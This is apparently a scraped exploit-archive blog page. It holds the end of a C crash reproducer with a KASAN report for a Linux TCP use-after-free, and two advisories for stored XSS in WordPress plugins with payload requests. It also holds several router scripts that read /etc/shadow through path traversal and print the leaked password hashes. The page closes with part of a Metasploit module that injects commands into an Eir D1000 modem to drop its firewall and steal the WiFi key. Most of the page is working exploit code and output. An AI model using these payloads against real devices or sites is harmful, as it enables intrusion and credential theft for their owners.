7\x10\x87\xb4\x32\x4a\x30\x69\xd2\xf4\x2b\x5d\x76\xa3\x94\x6b\x72\xd9\xc6\xfa\x6a\x49\x12\xc7\xc2\x74\x3f\xc4\x39\x9f\xa0\x7e\xcd\x81\x9c\x54\x0f\x14\xce\xd3\x7e\xd8\xe8\xd2\xc2\x24\x2e\xc5\x1b\x58\xf8\x8e\xe6\xaa\x16\x69\x6c\x4b\x40\x86\x1a\x1a\xad\x11\x6f\x90\x48\x68\x93\xb1\x8f\xbd\xaf\x8d\x00\x09\x5e\xf4\xe3\x03\x59\xff\x8f\xf5\xf0\xe2\xa1\x79\x93\xf5\x76\xcb\x56\x93\xb8\xe6\x22\xe5\x69\x90\x3d\x0f\x9b\x57\x86\x19\xf7\x63\xd5\x2c\xfe\xad\x63\x60\x9e\x9e\x29\x04\xe9\x4d\xb6\xd9\xb1\xdb\x42\x2d\x8b\x8d\x6d\xdd\xae\x0b\xca\x58\x38\xf4\x30\xad\xae\xa3\x3d\x64\x47\xe0\x77\xc3\xed\xc8\xe0\x7d\x3c\x6c\xda\xbd\x47\x5e\x37\xb4\xe4\xb8\x1c\x69\x16\xb6\xd5\x8b\x9a\x15\xfa\x6b\x21\x88\x74\xbb\xdf\xe3\xbe\x31\x02\x8e\x82\x81\x10\x98\x24\x74\x04\xad\xe3\xc5\x63\x57\x0d\x58\xbe\x1c\x97\xa1\x0d\xb6\x55\x83\x18\x41\x37\xa7\x1b\x51\x37\x13\x99\xeb\x6f\xe3\x70\xc2\x4a\x8c\x17\xc6\x30\x8d\x01\xfe\xd4\x71\x4c\xee\x82\x94\xe4\x1d\x9a\x8a\xed\x48\x61\xba\x6c\x63\x5f\x3b\x13\x9f\x5b\xe4\x0b\x2c\x44\x1c\xb7\xf6\xc7\x64\xf6\x74\x4a\x16\x7a\x35\xf7\x2e\x9d\x4f\x00\x38\xa7\xad\xe7\x17\x0c\xb7\x3f\x02\x41\xe9\xa3\x37\x5b\x98\xd5\x0f\xc6\xe6\xd1\x38\x4e\x87\x4f\x2f\x02\xa1\x27\x4d\xb2\x03\xfc\x50\x48\xaa\x33\x92\xe1\x10\xa6\x0b\xb0\x20\x7c\x57\xd4\x85\x55\x51\x6e\x7e\xdf\xa2\x46\xf5\x94\x93\x03\x02\xdb\x94\x55\x23\xd9\x5b\x99\x2b\x3a\x7e\x7d\xb1\x80\x47\xf9\x77\xee\x0f\x5e\x63\x7f\x1e\x96\xdf\xf9\x1c\x81\x55\xdd\x02\x81\x87\xc8\x04\x52\x59\x49\xd4\x08\xd5\x73\x43\x3f\xd2\xf9\xa9\xf0\xd7\xb9\x97\x86\x9c\x0a\xc6\x7d\x5a\x98\x88\x2b\x0b\x38\xa1\xcb\xf8\x71\xc7\x5d\xfe\xba\xd0\x26\x4b\xdf\xb8\x11\x8f\x71\x60\x68\xc7\x82\xd0\x36\x97\x23\x56\xda\x52\x58\x90\x0a\x42\x0b\xfc\xf8\xc9\x1f\x36\x7f\x9f\xe5\x5b\xf8\x6e\xe1\x78\x47\xfe\x6b\x00\xcd\xe5\x6b\xe2\xa6\xaf\x2b\x33\x95\x73\x79\x52\x13\x1c\x87\x3d\x8d\xbc\x32\x1e\x11\x25\x91\x51\xa0\xaf\xcc\xf1\xc3\x5a\xea\x8b\x15\x82\x76\xa9\x0f\xe7\x08\x73\x53\x02\x4c\x8c\xb2\x8d\x4b\xa0\xed\x37\x20\x7f\x54\xa2\x2a\x33\x6b\x5f\x3a\x4f\x54\x61\x85\x91\x86\x68\x5a\xd4\x80\xc9\x21\xa9\x16\x5d\x77\xee\x28\xeb\xc2\x5c\x22\xe4\x27\xdb\x5b\xe4\xa7\x70\xdc\x6a\x8e\xd9\xe7\x77\x09\x5b\x94\x97\xc6\xf4\x1f\x7a\x35\x9e\x26\x1e\x8b\x37\xe3\xa4\xdc\x0a\x8a\x19\x59\x3a\x77\x81\x2d\x9b\x0e\x51\x2b\xd7\xc5\xbc\x07\xfa\xf3\x29\x79\x35\x98\xe3\xb8\xf7\xe5\x40\xdf\xa8\x93\x00\xf6\x53\x8c\xcc\x33\xdf\x0e\x35\x3e\x72\x8d\x48\x85\x05\x40\x43\xe1\x13\xd6\x4a\x95\x50\xf8\x32\xca\xc3\x1c\x28\xd4\x41\x15\x64\xc1\x08\xfb\x2c\xc2\x1f\x79\x30\x58\xaa\x7c\x0d\x83\x8e\x87\xf4\x2e\xa3\xfc\xeb\xd0\xdb\xcc\x15\xcd\x88\x99\x41\x75\x13\xc1\x0c\x53\x96\xfe\xff\xeb\x87\x6a\x04\x75\xf2\x98\x40\x7e\xc7\x4e\x47\x63\x31\x2f\xb2\xa2\x88\x30\xca\x49\xfb\x57\x40\x65\x8c\xc9\x80\x20\xb9\xc9\xfc\x79\x12\x8d\xe6\x24\x24\x5f\x38\x47\x3c\x93\x64\x41\x9a\xf2\xe8\xab\xc1\xaf\x13\x95\x5c\x26\x4e\x02\x99\x5f\x6a\xe3\xd4\x91\x0a\xf5\x06\x3a\x2d\xc9\x22\x96\x6b\xa0\x77\x00\x77\x7c\x26\xdc\xb6\xc1\x1b\x6c\xc8\xfe\x43\x2c\xe2\xdc\x58\x7e\x30\x38\x98\x97\xdf\xda\xae\x9d\x40\x94\xb7\x16\x91\x66\x94\x6c\x2a\x50\x39\x69\xce\xb4\x5c\xec\x2e\x60\x71\x92\xa3\x14\x1f\x08\x70\xcb\x9c\x47\x5b\xf3\xf4\xea\x7a\x34\x43\x32\x8b\x19\x57\xd2\xe7\x1c\xc5\xeb\xa5\x66\x37\x73\x80\x59\xac\x1e\xc0\x2f\xf1\x30\xf4\xd0\xc7\x78\x2b\x38\xd3\xab\x74\xfd\x4d\xdf\x5e\xc5\xa7\x89\x1b\xb7\x76\xf5\xf9\xfd\xca\xfc\xc2\x0d", 4096);
r[53] = syscall(SYS_sendto, r[10], 0x20015285ul, 0x1000ul, 0xc080ul, 0x0ul, 0x0ul);
r[54] = syscall(SYS_mmap, 0x20022000ul, 0x1000ul, 0x3ul, 0x32ul, 0xfffffffffffffffful, 0x0ul);
*(uint32_t*)0x20022fdd = (uint32_t)0x28;
*(uint32_t*)0x20022fe1 = (uint32_t)0x400;
*(uint64_t*)0x20022fe5 = (uint64_t)0x0;
*(uint64_t*)0x20022fed = (uint64_t)0x8ab;
*(uint64_t*)0x20022ff5 = (uint64_t)0xfffffffffffffffb;
*(uint16_t*)0x20022ffd = (uint16_t)0x5;
r[61] = syscall(SYS_write, r[10], 0x20022fddul, 0x28ul, 0, 0, 0);
} else if (pid > 0) {
int returnStatus;
waitpid(pid, &returnStatus, 0);
printf("collected child\n");
} else {
printf("fork failed\n");
exit(1);
}
}
return 0;
}
// KASAN report on v4.8-rc1, equivalent on master
/*
[ 21.446876] BUG: KASAN: use-after-free in tcp_xmit_retransmit_queue+0xc75/0xdb0 at addr ffff88007a06d428
[ 21.447953] Read of size 4 by task rsyslogd/1612
[ 21.448465] CPU: 0 PID: 1612 Comm: rsyslogd Tainted: G B 4.8.0-rc1 #1
[ 21.449263] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS Ubuntu-1.8.2-1ubuntu1 04/01/2014
[ 21.450270] 0000000000000000 0000000015e55fbd ffff88007dc07268 ffffffff81bef151
[ 21.451135] ffff88011cfb0d80 ffff88007a06d400 ffff88007a06d5a8 ffff88007a06d400
[ 21.452002] ffff88007dc07290 ffffffff815d0351 ffff88007dc07328 ffff88007a06d400
[ 21.452873] Call Trace:
[ 21.453142] <IRQ> [<ffffffff81bef151>] dump_stack+0x83/0xb2
[ 21.453835] [<ffffffff815d0351>] kasan_object_err+0x21/0x70
[ 21.454450] [<ffffffff815d05f4>] kasan_report_error+0x204/0x500
[ 21.455135] [<ffffffff815d0a31>] __asan_report_load4_noabort+0x61/0x70
[ 21.455899] [<ffffffff82a90f55>] ? tcp_xmit_retransmit_queue+0xc75/0xdb0
[ 21.456624] [<ffffffff82a90f55>] tcp_xmit_retransmit_queue+0xc75/0xdb0
[ 21.457329] [<ffffffff82a53aba>] tcp_xmit_recovery.part.54+0x2a/0x120
[ 21.458028] [<ffffffff82a69c96>] tcp_ack+0x2716/0x4ed0
[ 21.458590] [<ffffffff815cf6e6>] ? save_stack+0x46/0xd0
[ 21.459189] [<ffffffff815cf95d>] ? kasan_kmalloc+0xad/0xe0
[ 21.459804] [<ffffffff82a67580>] ? tcp_fastretrans_alert+0x2dc0/0x2dc0
[ 21.460540] [<ffffffff82a5a63f>] ? tcp_parse_options+0x18f/0xb20
[ 21.461237] [<ffffffff811ea161>] ? ttwu_do_wakeup+0x21/0x2d0
[ 21.461865] [<ffffffff82a6e8b1>] ? tcp_validate_incoming+0x821/0x1210
[ 21.462581] [<ffffffff81c0e93e>] ? put_dec+0x2e/0xc0
[ 21.463167] [<ffffffff82a74201>] tcp_rcv_established+0x5b1/0x20c0
[ 21.463884] [<ffffffff815cfaa5>] ? memcpy+0x45/0x50
[ 21.464414] [<ffffffff828ec80a>] ? __copy_skb_header+0x19a/0x1f0
[ 21.465057] [<ffffffff82a73c50>] ? tcp_data_queue+0x4240/0x4240
[ 21.465719] [<ffffffff828eca97>] ? __skb_clone+0x237/0x7a0
[ 21.466326] [<ffffffff815cbed8>] ? kmem_cache_alloc+0xb8/0x1b0
[ 21.466954] [<ffffffff82baa6b7>] ? rt6_check_expired+0xa7/0x120
[ 21.467591] [<ffffffff82bae7f2>] ? ip6_dst_check+0x262/0x410
[ 21.468231] [<ffffffff82c0ff52>] tcp_v6_do_rcv+0x642/0x13c0
[ 21.468836] [<ffffffff82c148d2>] tcp_v6_rcv+0x1a32/0x2550
[ 21.469462] [<ffffffff81233abb>] ? trigger_load_balance+0x3fb/0x8b0
[ 21.470179] [<ffffffff82beaa55>] ? raw6_local_deliver+0x555/0x6f0
[ 21.470953] [<ffffffff82b82dec>] ip6_input_finish+0x2ac/0xd50
[ 21.471600] [<ffffffff82b8396a>] ip6_input+0xda/0x1f0
[ 21.472149] [<ffffffff81117670>] ? kvm_guest_apic_eoi_write+0x70/0x90
[ 21.472870] [<ffffffff82b83890>] ? ip6_input_finish+0xd50/0xd50
[ 21.473521] [<ffffffff8128a722>] ? handle_fasteoi_irq+0x362/0x6a0
[ 21.474210] [<ffffffff810f56c0>] ? ioapic_ir_ack_level+0xd0/0xd0
[ 21.474858] [<ffffffff82b8291e>] ip6_rcv_finish+0x11e/0x340
[ 21.475487] [<ffffffff82b84806>] ipv6_rcv+0xd86/0x1750
[ 21.476043] [<ffffffff82b83a80>] ? ip6_input+0x1f0/0x1f0
[ 21.476615] [<ffffffff82cadeb5>] ? _raw_spin_unlock_irqrestore+0x15/0x20
[ 21.477332] [<ffffffff815d03d7>] ? kasan_end_report+0x37/0x50
[ 21.478956] [<ffffffff815d0825>] ? kasan_report_error+0x435/0x500
[ 21.479618] [<ffffffff82b83a80>] ? ip6_input+0x1f0/0x1f0
[ 21.480250] [<ffffffff8293926f>] __netif_receive_skb_core+0x15df/0x26c0
[ 21.481017] [<ffffffff812092c0>] ? update_curr+0x150/0x4e0
[ 21.481700] [<ffffffff82937c90>] ? netdev_info+0x120/0x120
[ 21.482339] [<ffffffff812bf12b>] ? hrtimer_active+0x1db/0x280
[ 21.482969] [<ffffffff81206b3d>] ? cpu_load_update+0x1bd/0x350
[ 21.483619] [<ffffffff81227f2c>] ? task_tick_fair+0x119c/0x2420
[ 21.484295] [<ffffffff810fddf1>] ? __x2apic_send_IPI_dest.constprop.4+0x31/0x40
[ 21.485101] [<ffffffff810fe072>] ? x2apic_send_IPI+0x72/0xa0
[ 21.485739] [<ffffffff8293a37f>] __netif_receive_skb+0x2f/0x170
[ 21.486383] [<ffffffff8293e1a7>] process_backlog+0x197/0x580
[ 21.487021] [<ffffffff8293bc9a>] net_rx_action+0x6ca/0xbb0
[ 21.487615] [<ffffffff8293b5d0>] ? sk_busy_loop+0x7b0/0x7b0
[ 21.488258] [<ffffffff8111850e>] ? kvm_clock_get_cycles+0x1e/0x20
[ 21.488909] [<ffffffff812d3e90>] ? ktime_get+0xb0/0x110
[ 21.489471] [<ffffffff810fdc1b>] ? native_apic_msr_write+0x2b/0x30
[ 21.490147] [<ffffffff812e3ca6>] ? clockevents_program_event+0x246/0x340
[ 21.490868] [<ffffffff82cb121e>] __do_softirq+0x1ce/0x57d
[ 21.491470] [<ffffffff811769d7>] irq_exit+0x117/0x140
[ 21.492035] [<ffffffff82cb0dd0>] smp_apic_timer_interrupt+0x80/0xa0
[ 21.492712] [<ffffffff82caf062>] apic_timer_interrupt+0x82/0x90
[ 21.493378] <EOI> Object at ffff88007a06d400, in cache skbuff_fclone_cache size: 424
[ 21.494277] Allocated:
[ 21.494538] PID = 1711
[ 21.494801] [<ffffffff810b308b>] save_stack_trace+0x2b/0x50
[ 21.495416] [<ffffffff815cf6e6>] save_stack+0x46/0xd0
[ 21.495970] [<ffffffff815cf95d>] kasan_kmalloc+0xad/0xe0
[ 21.496572] [<ffffffff815cfe92>] kasan_slab_alloc+0x12/0x20
[ 21.497185] [<ffffffff815cc51e>] kmem_cache_alloc_node+0xfe/0x1d0
[ 21.497853] [<ffffffff828f21f2>] __alloc_skb+0xd2/0x5d0
[ 21.498475] [<ffffffff82a480fd>] sk_stream_alloc_skb+0xbd/0x790
[ 21.499129] [<ffffffff82a4b464>] tcp_sendmsg+0x13f4/0x2d10
[ 21.499754] [<ffffffff82afb2ac>] inet_sendmsg+0x24c/0x350
[ 21.500371] [<ffffffff828d58ef>] sock_sendmsg+0xcf/0x110
[ 21.500988] [<ffffffff828d5b52>] sock_write_iter+0x222/0x3c0
[ 21.501625] [<ffffffff8162d10b>] __vfs_write+0x3cb/0x640
[ 21.502249] [<ffffffff8162e315>] vfs_write+0x175/0x4a0
[ 21.502838] [<ffffffff81631b78>] SyS_write+0xd8/0x1b0
[ 21.503429] [<ffffffff82cae476>] entry_SYSCALL_64_fastpath+0x1e/0xa8
[ 21.504144] Freed:
[ 21.504368] PID = 1711
[ 21.504628] [<ffffffff810b308b>] save_stack_trace+0x2b/0x50
[ 21.505290] [<ffffffff815cf6e6>] save_stack+0x46/0xd0
[ 21.505879] [<ffffffff815cff13>] kasan_slab_free+0x73/0xc0
[ 21.506501] [<ffffffff815cb70c>] kmem_cache_free+0x7c/0x210
[ 21.507128] [<ffffffff828eba3b>] kfree_skbmem+0x7b/0xf0
[ 21.507752] [<ffffffff828f3e22>] __kfree_skb+0x22/0x30
[ 21.508339] [<ffffffff82a4b8ad>] tcp_sendmsg+0x183d/0x2d10
[ 21.508962] [<ffffffff82afb2ac>] inet_sendmsg+0x24c/0x350
[ 21.509574] [<ffffffff828d58ef>] sock_sendmsg+0xcf/0x110
[ 21.510194] [<ffffffff828d5b52>] sock_write_iter+0x222/0x3c0
[ 21.510818] [<ffffffff8162d10b>] __vfs_write+0x3cb/0x640
[ 21.511408] [<ffffffff8162e315>] vfs_write+0x175/0x4a0
[ 21.512003] [<ffffffff81631b78>] SyS_write+0xd8/0x1b0
[ 21.512562] [<ffffffff82cae476>] entry_SYSCALL_64_fastpath+0x1e/0xa8
[ 21.513258] Memory state around the buggy address:
[ 21.513770] ffff88007a06d300: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
[ 21.514546] ffff88007a06d380: 00 00 00 00 00 fc fc fc fc fc fc fc fc fc fc fc
[ 21.515310] >ffff88007a06d400: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb
[ 21.516114] ^
[ 21.516611] ffff88007a06d480: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb
[ 21.517400] ffff88007a06d500: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb
[ 21.518203] ==================================================================
*/
.png.c9b8f3e9eda461da3c0e9ca5ff8c6888.png)
A group blog by Leader in
Hacker Website - Providing Professional Ethical Hacking Services
-
Entries
16114 -
Comments
7952 -
Views
863109227
Contributors to this blog
-
16114
About this blog
Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.
Entries in this blog
Source: https://sumofpwn.nl/advisory/2016/stored_cross_site_scripting_vulnerability_in_404_to_301_wordpress_plugin.html
Stored Cross-Site Scripting vulnerability in 404 to 301 WordPress Plugin
Abstract
A stored Cross-Site Scripting vulnerability was found in the 404 to 301 WordPress Plugin. This issue can be exploited by an anonymous user and allows an attacker to perform a wide variety of actions, such as stealing users' session tokens, or performing arbitrary actions on their behalf.
Contact
For feedback or questions about this advisory mail us at sumofpwn at securify.nl
The Summer of Pwnage
This issue has been found during the Summer of Pwnage hacker event, running from July 1-29. A community summer event in which a large group of security bughunters (worldwide) collaborate in a month of security research on Open Source Software (WordPress this time). For fun. The event is hosted by Securify in Amsterdam.
OVE ID
OVE-20160719-0003
Tested versions
This issue was successfully tested on 404 to 301 WordPress Plugin version 2.2.8.
Fix
This issue is resolved in 404 to 301 WordPress Plugin version 2.3.1.
Introduction
The 404 to 301 WordPress Plugin automatically redirects, logs and notifies all 404 page errors to any page using 301 redirect for SEO. A Stored Cross-Site Scripting vulnerability exists in the 404-to-301 WordPress plugin.
Details
The vulnerability exists in the file admin/class-404-to-301-logs.php, which fails to correctly escape user-controlled strings which are output in HTML tables containing logs shown to site administrators, such as the Referer (ref) and User-Agent (ua) fields.
In order to exploit this issue, after an attack attempt has been made, an administrator must view the logs (via the WordPress administration console) provided by the plugin, by clicking '404 Error Logs'.
Proof of concept
Submit an HTTP request to a non-existent URL (to trigger the 404 handler) containing a header such as one of the following:
Referer: "<iframe src=/></iframe>
User-Agent: "<script>alert(/hi/);</script>
Source: https://sumofpwn.nl/advisory/2016/persistent_cross_site_scripting_in_wassup_real_time_analytics_wordpress_plugin.html
Persistent Cross-Site Scripting in WassUp Real Time Analytics WordPress Plugin
Abstract
A stored Cross-Site Scripting (XSS) vulnerability has been found in the WassUp Real Time Analytics WordPress Plugin. By using this vulnerability an attacker can inject malicious JavaScript code into the application, which will execute within the browser of any user who views the Activity Log, in general WP admin.
Contact
For feedback or questions about this advisory mail us at sumofpwn at securify.nl
The Summer of Pwnage
This issue has been found during the Summer of Pwnage hacker event, running from July 1-29. A community summer event in which a large group of security bughunters (worldwide) collaborate in a month of security research on Open Source Software (WordPress this time). For fun. The event is hosted by Securify in Amsterdam.
OVE ID
OVE-20160717-0002
Tested versions
This issue was successfully tested on WassUp Real Time Analytics version 1.9.
Fix
This issue has been fixed in version 1.9.1.
Introduction
The WassUp Real Time Analytics WordPress plugin can be used to analyze visitors' traffic with real-time statistics.
Details
A stored Cross-Site Scripting vulnerability was found in the Wassup WordPress plugin. This issue allows an attacker to perform a wide variety of actions, such as stealing Administrators' session tokens, or performing arbitrary actions on their behalf. Particularly interesting about this issue is that an anonymous user can simply store his XSS payload in the Admin dashboard by just visiting the public site with a malformed link.
The malicious script code can be sent by anyone visiting the website (unauthenticated). The malicious code is then executed in the admin panel under section 'Current Visitors' of the Wassup plugin page.
The issue exists in the file wassup.php and is caused by the lack of output encoding on the request-uri parameter. The vulnerable code is listed below.
</span><span class="request-uri"><?php echo wassupURI::url_link
and in the file wassup.class.php:
else $urllink='<a href="'.self::add_siteurl("$urlrequested").'" target="_BLANK">'.stringShortener("$urlrequested",$chars).'</a>';
return $urllink;
Proof of concept
1. Log in as admin and empty the log data of Wassup for a clean test -> http://<targetsite>/wp-admin/admin.php?page=wassup-options -> Manage Files and Data -> Empty table
2. Open Burp Suite and sent the following requests one after another:
GET /test HTTP/1.1
Host: <targetsite>
GET ///--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(70,70,70))</SCRIPT> HTTP/1.1
Host: <targetsite>
3. Open the Current Visitors Online page as an admin: http://<targetsite>/wp-admin/admin.php?page=wassup-online
Note: Your request should be detected as a Spider/Bot by the Wassup plugin. One way to do this is by sending the requests above through Burp Suite.
#!/bin/sh
#
# MOVISTAR ADSL ROUTER BHS_RTA BHS_RTA_C0_019
# Remote File Disclosure
#
# Vendor: OBSERVA
# Model: BHS_RTA
# Software: BHS_RTA_CO_019
# Firmware: 09/08/2012-10:23:25
#
#
# Copyright 2016 (c) Todor Donev
# <todor.donev at gmail.com>
# https://www.ethical-hacker.org/
# https://www.facebook.com/ethicalhackerorg
#
# Disclaimer:
# This or previous programs is for Educational
# purpose ONLY. Do not use it without permission.
# The usual disclaimer applies, especially the
# fact that Todor Donev is not liable for any
# damages caused by direct or indirect use of the
# information or functionality provided by these
# programs. The author or any Internet provider
# bears NO responsibility for content or misuse
# of these programs or any derivatives thereof.
# By using these programs you accept the fact
# that any damage (dataloss, system crash,
# system compromise, etc.) caused by the use
# of these programs is not Todor Donev's
# responsibility.
#
# Use them at your own risk!
#
# Thanks to Maya Hristova that support me.
[todor@adamantium ~]$ torsocks GET "http://TARGET/cgi-bin/webproc?getpage=/etc/shadow&var:language=es_es&var:page="
# #root:$1$BOYmzSKq$ePjEPSpkQGeBcZjlEeLqI.:13796:0:99999:7:::
# root:$1$BOYmzSKq$ePjEPSpkQGeBcZjlEeLqI.:13796:0:99999:7:::
# #tw:$1$zxEm2v6Q$qEbPfojsrrE/YkzqRm7qV/:13796:0:99999:7:::
#!/bin/sh
#
# D-Link ADSL ROUTER DSL-2730U IN_1.02
# Remote File Disclosure
#
# Modem Name: DSL-2730U/DSL-2750E
# Time and Date: 2012-05-23 09:51:16
# HardwareVersion: U1
# Firmware Version: IN_1.02/SEA_1.04/SEA_1.07
#
# Copyright 2016 (c) Todor Donev
# <todor.donev at gmail.com>
# https://www.ethical-hacker.org/
# https://www.facebook.com/ethicalhackerorg
#
# Disclaimer:
# This or previous programs is for Educational
# purpose ONLY. Do not use it without permission.
# The usual disclaimer applies, especially the
# fact that Todor Donev is not liable for any
# damages caused by direct or indirect use of the
# information or functionality provided by these
# programs. The author or any Internet provider
# bears NO responsibility for content or misuse
# of these programs or any derivatives thereof.
# By using these programs you accept the fact
# that any damage (dataloss, system crash,
# system compromise, etc.) caused by the use
# of these programs is not Todor Donev's
# responsibility.
#
# Use them at your own risk!
#
# Thanks to Maya Hristova that support me.
[todor@adamantium ~]$ torsocks GET "http://TARGET:PORT/cgi-bin/webproc?getpage=/etc/shadow&errorpage=html/main.html&var:language=en_us&var:menu=setup&var:page=wizard"
# #root:$1$BOYmzSKq$ePjEPSpkQGeBcZjlEeLqI.:13796:0:99999:7:::
# root:$1$BOYmzSKq$ePjEPSpkQGeBcZjlEeLqI.:13796:0:99999:7:::
# #tw:$1$zxEm2v6Q$qEbPfojsrrE/YkzqRm7qV/:13796:0:99999:7:::
#!/bin/sh
#
# NETGEAR ADSL ROUTER JNR1010 1.0.0.16
# Authenticated Remote File Disclosure
#
# Hardware Version: JNR1010
# Firmware Version: 1.0.0.16
# GUI Language Version: 1.0.0.16
#
# Copyright 2016 (c) Todor Donev
# <todor.donev at gmail.com>
# https://www.ethical-hacker.org/
# https://www.facebook.com/ethicalhackerorg
#
# Disclaimer:
# This or previous programs is for Educational
# purpose ONLY. Do not use it without permission.
# The usual disclaimer applies, especially the
# fact that Todor Donev is not liable for any
# damages caused by direct or indirect use of the
# information or functionality provided by these
# programs. The author or any Internet provider
# bears NO responsibility for content or misuse
# of these programs or any derivatives thereof.
# By using these programs you accept the fact
# that any damage (dataloss, system crash,
# system compromise, etc.) caused by the use
# of these programs is not Todor Donev's
# responsibility.
#
# Use them at your own risk!
#
# Thanks to Maya Hristova that support me.
http://USER:PASSWORD@TARGET:PORT/cgi-bin/webproc?getpage=/etc/shadow&var:language=en_us&var:language=en_us&var:menu=advanced&var:page=basic_home
# #root:$1$BOYmzSKq$ePjEPSpkQGeBcZjlEeLqI.:13796:0:99999:7:::
# root:$1$BOYmzSKq$ePjEPSpkQGeBcZjlEeLqI.:13796:0:99999:7:::
# #tw:$1$zxEm2v6Q$qEbPfojsrrE/YkzqRm7qV/:13796:0:99999:7:::
#!/bin/sh
#
# NETGEAR ADSL ROUTER
# Authenticated Remote File Disclosure
#
# Hardware Version: WNR500 / WNR612v3 / JNR1010 / JNR2010
# Firmware Version: 1.0.7.2 / 1.0.0.9 / 1.0.0.32 / 1.0.0.20
#
# Copyright 2016 (c) Todor Donev
# <todor.donev at gmail.com>
# https://www.ethical-hacker.org/
# https://www.facebook.com/ethicalhackerorg
#
# Disclaimer:
# This or previous programs is for Educational
# purpose ONLY. Do not use it without permission.
# The usual disclaimer applies, especially the
# fact that Todor Donev is not liable for any
# damages caused by direct or indirect use of the
# information or functionality provided by these
# programs. The author or any Internet provider
# bears NO responsibility for content or misuse
# of these programs or any derivatives thereof.
# By using these programs you accept the fact
# that any damage (dataloss, system crash,
# system compromise, etc.) caused by the use
# of these programs is not Todor Donev's
# responsibility.
#
# Use them at your own risk!
#
# Thanks to Maya Hristova that support me.
http://USER:PASSWORD@TARGET:PORT/cgi-bin/webproc?getpage=/etc/shadow&errorpage=html/main.html&var:language=en_us&var:language=en_us&var:page=BAS_bpa
# #root:$1$BOYmzSKq$ePjEPSpkQGeBcZjlEeLqI.:13796:0:99999:7:::
# root:$1$BOYmzSKq$ePjEPSpkQGeBcZjlEeLqI.:13796:0:99999:7:::
# #tw:$1$zxEm2v6Q$qEbPfojsrrE/YkzqRm7qV/:13796:0:99999:7:::
#!/bin/sh
#
# PLANET ADSL ROUTER AND-4101 v1.8
# Remote File Disclosure
#
# Modem Name: ADN-4101
# HardwareVersion: ADN-4101
# SoftwareVersion: V1.8
# Firmware Version: V1.8
#
# Copyright 2016 (c) Todor Donev
# <todor.donev at gmail.com>
# https://www.ethical-hacker.org/
# https://www.facebook.com/ethicalhackerorg
#
# Disclaimer:
# This or previous programs is for Educational
# purpose ONLY. Do not use it without permission.
# The usual disclaimer applies, especially the
# fact that Todor Donev is not liable for any
# damages caused by direct or indirect use of the
# information or functionality provided by these
# programs. The author or any Internet provider
# bears NO responsibility for content or misuse
# of these programs or any derivatives thereof.
# By using these programs you accept the fact
# that any damage (dataloss, system crash,
# system compromise, etc.) caused by the use
# of these programs is not Todor Donev's
# responsibility.
#
# Use them at your own risk!
#
# Thanks to Maya Hristova that support me.
[todor@adamantium]$ torsocks GET "https://TARGET:PORT/cgi-bin/webproc?getpage=/etc/shadow&errorpage=html/main.html&var:language=en_us&var:menu=setup&var:page=wizard"
# #root:$1$BOYmzSKq$ePjEPSpkQGeBcZjlEeLqI.:13796:0:99999:7:::
# root:$1$BOYmzSKq$ePjEPSpkQGeBcZjlEeLqI.:13796:0:99999:7:::
# #tw:$1$zxEm2v6Q$qEbPfojsrrE/YkzqRm7qV/:13796:0:99999:7:::
=begin
# Exploit Title: Eir D1000 Wireless Router - WAN Side Remote Command Injection
# Date: 7th November 2016
# Exploit Author: Kenzo
# Website: https://devicereversing.wordpress.com
# Tested on Firmware version: 2.00(AADU.5)_20150909
# Type: Webapps
# Platform: Hardware
Description
===========
By sending certain TR-064 commands, we can instruct the modem to open port 80 on the firewall. This allows access the the web administration interface from the Internet facing side of the modem. The default login password for the D1000 is the default Wi-Fi password. This is easily obtained with another TR-064 command.
Proof of Concept
================
=end
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class MetasploitModule < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'Eir D1000 Modem CWMP Exploit POC',
'Description' => %q{
This exploit drops the firewall to allow access to the web administration interface on port 80 and
it also retrieves the wifi password. The default login password to the web interface is the default wifi
password. This exploit was tested on firmware versions up to 2.00(AADU.5)_20150909.
},
'Author' =>
[
'Kenzo', # Vulnerability discovery and Metasploit module
],
'License' => MSF_LICENSE,
'DisclosureDate' => 'Nov 07 2016',
'Privileged' => true,
'DefaultOptions' =>
{
'PAYLOAD' => 'linux/mipsbe/shell_bind_tcp'
},
'Targets' =>
[
[ 'MIPS Little Endian',
{
'Platform' => 'linux',
'Arch' => ARCH_MIPSLE
}
],
[ 'MIPS Big Endian',
{
'Platform' => 'linux',
'Arch' => ARCH_MIPSBE
}
],
],
'DefaultTarget' => 1
))
register_options(
[
Opt::RPORT(7547), # CWMP port
], self.class)
@data_cmd_template = "<?xml version=\"1.0\"?>"
@data_cmd_template << "<SOAP-ENV:Envelope xmlns:SOAP-ENV=\"http://schemas.xmlsoap.org/soap/envelope/\" SOAP-ENV:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\">"
@data_cmd_template << " <SOAP-ENV:Body>"
@data_cmd_template << " <u:SetNTPServers xmlns:u=\"urn:dslforum-org:service:Time:1\">"
@data_cmd_template << " <NewNTPServer1>%s</NewNTPServer1>"
@data_cmd_template << " <NewNTPServer2></NewNTPServer2>"
@data_cmd_template << " <NewNTPServer3></NewNTPServer3>"
@data_cmd_template << " <NewNTPServer4></NewNTPServer4>"
@data_cmd_template << " <NewNTPServer5></NewNTPServer5>"
@data_cmd_template << " </u:SetNTPServers>"
@data_cmd_template << " </SOAP-ENV:Body>"
@data_cmd_template << "</SOAP-ENV:Envelope>"
end
def check
begin
res = send_request_cgi({
'uri' => '/globe'
})
rescue ::Rex::ConnectionError
vprint_error("A connection error has occured")
return Exploit::CheckCode::Unknown
end
if res and res.code == 404 and res.body =~ /home_wan.htm/
return Exploit::CheckCode::Appears
end
return Exploit::CheckCode::Safe
end
def exploit
print_status("Trying to access the device...")
unless check == Exploit::CheckCode::Appears
fail_with(Failure::Unknown, "#{peer} - Failed to access the vulnerable device")
end
print_status("Exploiting...")
print_status("Dropping firewall on port 80...")
execute_command("`iptables -I INPUT -p tcp --dport 80 -j ACCEPT`","")
key = get_wifi_key()
print_status("WiFi key is #{key}")
execute_command("tick.eircom.net","")
end
def execute_command(cmd, opts)
